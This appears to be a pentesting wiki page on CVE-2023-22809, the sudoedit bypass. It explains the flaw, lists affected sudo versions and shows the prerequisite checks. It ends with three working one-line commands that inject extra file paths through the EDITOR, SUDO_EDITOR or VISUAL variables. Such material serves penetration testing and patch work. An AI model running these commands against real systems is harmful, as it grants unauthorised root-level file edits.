Sudoedit Bypass

CVE-2023-22809

Theory

Sudo uses user-provided environment variables to let its users select their editor of choice. The content of these variables extends the actual command passed to the sudo_edit() function. However, the latter relies on the presence of the -- argument to determine the list of files to edit. The injection of an extra -- argument in one of the authorized environment variables can alter this list and lead to privilege escalation by editing any other file with privileges of the RunAs user. This issue occurs after the sudoers policy validation. - Synacktiv

The vulnerability affect sudo versions 1.8.0 to 1.9.12p1.

Practice

To exploit, sudo version must be vulnerable (1.8.0 to 1.9.12p1)

$ sudo -V
Sudo version 1.8.0

You must be able to run sudoedit with sudo

$ sudo -l
[sudo] password for user:
Matching Defaults entries for user on vulnserver:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty

User user may run the following commands on vulnserver:
    (ALL:ALL) sudoedit /etc/custom/service.conf

And env_delete shouldn't be set to affected variables:

env_delete+="SUDO_EDITOR VISUAL EDITOR"

To exploit it, we may use one of the following commands:

EDITOR='vim -- /etc/passwd' sudoedit /etc/custom/service.conf

SUDO_EDITOR='vim -- /etc/passwd' sudoedit /etc/custom/service.conf

VISUAL='vim -- /etc/passwd' sudoedit /etc/custom/service.conf

References

Last updated 1 year ago